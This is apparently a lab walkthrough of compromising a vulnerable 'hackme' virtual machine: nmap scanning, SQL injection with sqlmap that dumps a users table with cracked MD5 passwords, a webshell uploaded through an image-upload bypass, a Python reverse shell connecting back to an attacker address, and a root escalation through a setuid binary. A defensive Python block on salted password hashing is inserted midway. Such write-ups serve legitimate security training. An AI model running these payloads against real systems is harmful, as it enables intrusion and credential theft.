Information gathering
Nmap
Host discovery:
└─# nmap -sn 192.168.10.1/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 15:00 CST
Nmap scan report for 192.168.10.1 (192.168.10.1)
Host is up (0.00012s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.10.2 (192.168.10.2)
Host is up (0.00017s latency).
MAC Address: 00:50:56:E5:B1:08 (VMware)
Nmap scan report for 192.168.10.133 (192.168.10.133) // target machine
Host is up (0.00033s latency).
Port scan:
└─# nmap -sS -p- 192.168.10.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 15:01 CST
Nmap scan report for 192.168.10.133 (192.168.10.133)
Host is up (0.00055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:DC:16:77 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds
Service scan:
└─# nmap -sSCV -p 22,80 -O --version-all 192.168.10.133
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
| 256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.34 (Ubuntu)
MAC Address: 00:0C:29:DC:16:77 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory scan:
Found the file-upload path.
Web pages:
The home page is a login page, and it allows user registration.
Registered a user and logged in. It turns out to be a query page:
SQL injection
Found the injection point (3 columns), so I ran sqlmap against it directly.
Kept it running and collected the results:
Database: webapphacking
[2 tables]
+-------+
| books |
| users |
+-------+
Database: webapphacking
Table: users
[7 entries]
+----+--------------+------------+----------------+---------------------------------------------+
| id | name | user | address | pasword |
+----+--------------+------------+----------------+---------------------------------------------+
| 1 | David | user1 | Newton Circles | 5d41402abc4b2a76b9719d911017c592 (hello) |
| 2 | Beckham | user2 | Kensington | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| 3 | anonymous | user3 | anonymous | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| 10 | testismyname | test | testaddress | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 11 | superadmin | superadmin | superadmin | 2386acb2cf356944177746fc92523983 |
| 12 | test1 | test1 | test1 | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 13 | kitha | kitha | kitha | e10adc3949ba59abbe56e057f20f883e (123456) |
+----+--------------+------------+----------------+---------------------------------------------+
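The dump above shows why the `pasword` column fell so quickly: the hashes are unsalted MD5, so every value is one dictionary lookup away from its plaintext. The following added example (not part of the original writeup) re-checks two of the dumped rows against the MD5 of their recovered plaintext, then shows the storage scheme the application should have used: salted, iterated PBKDF2-HMAC-SHA256 with a constant-time comparison. The iteration count is an assumption chosen for illustration.

```python
import hashlib
import hmac
import os

# Rows constructed from the users table dumped above: (user, stored hash, recovered plaintext).
DUMPED_ROWS = [
    ("user1", "5d41402abc4b2a76b9719d911017c592", "hello"),
    ("kitha", "e10adc3949ba59abbe56e057f20f883e", "123456"),
]


def md5_matches(stored_hex: str, candidate: str) -> bool:
    """Unsalted MD5: identical passwords always give identical hashes,
    so a leaked hash is recoverable by a plain lookup table."""
    digest = hashlib.md5(candidate.encode("utf-8")).hexdigest()
    return hmac.compare_digest(digest, stored_hex)


def check_dump(rows):
    """Return the users whose stored hash is exactly the MD5 of the recovered plaintext."""
    return [user for user, stored, plain in rows if md5_matches(stored, plain)]


PBKDF2_ITERATIONS = 200_000  # assumption: work factor for illustration, tune per deployment


def hash_password(password: str, salt: bytes = None) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256; the salt and work factor travel with the hash."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(stored: str, candidate: str) -> bool:
    """Recompute with the stored salt and iteration count, compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("recoverable by lookup:", check_dump(DUMPED_ROWS))
    h1, h2 = hash_password("hello"), hash_password("hello")
    print("same password, different salts -> different hashes:", h1 != h2)
    print("verify:", verify_password(h1, "hello"), verify_password(h1, "hello!"))
```

With the salted scheme, two users sharing the password "testtest" (rows 10 and 12 above) would no longer be visible as duplicate hashes in a dump.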
Uploading a one-line webshell
Logged in as the super administrator superadmin and found the upload page. An image webshell can be uploaded and the extension then changed with Burp Suite.
AntSword connected successfully.
Reverse shell:
nc cannot be used here, so a Python reverse shell is used instead.
kali: nc -lvnp 2233
Create ftshell.py with the following content, upload it to the directory with AntSword, and execute it.
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.10.129",2233))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
AntSword terminal: python ftshell.py
Privilege escalation:
www-data@hackme:/var/www/html/uploads$ cd /home
cd /home
www-data@hackme:/home$ ls
ls
hackme
legacy
www-data@hackme:/home$ cd hackme
cd hackme
www-data@hackme:/home/hackme$ ls
ls
www-data@hackme:/home/hackme$ cd ..
cd ..
www-data@hackme:/home$ cd legacy
www-data@hackme:/home/legacy$ ls
ls
touchmenot
www-data@hackme:/home/legacy$ ./touchmenot
./touchmenot
id
uid=0(root) gid=33(www-data) groups=33(www-data)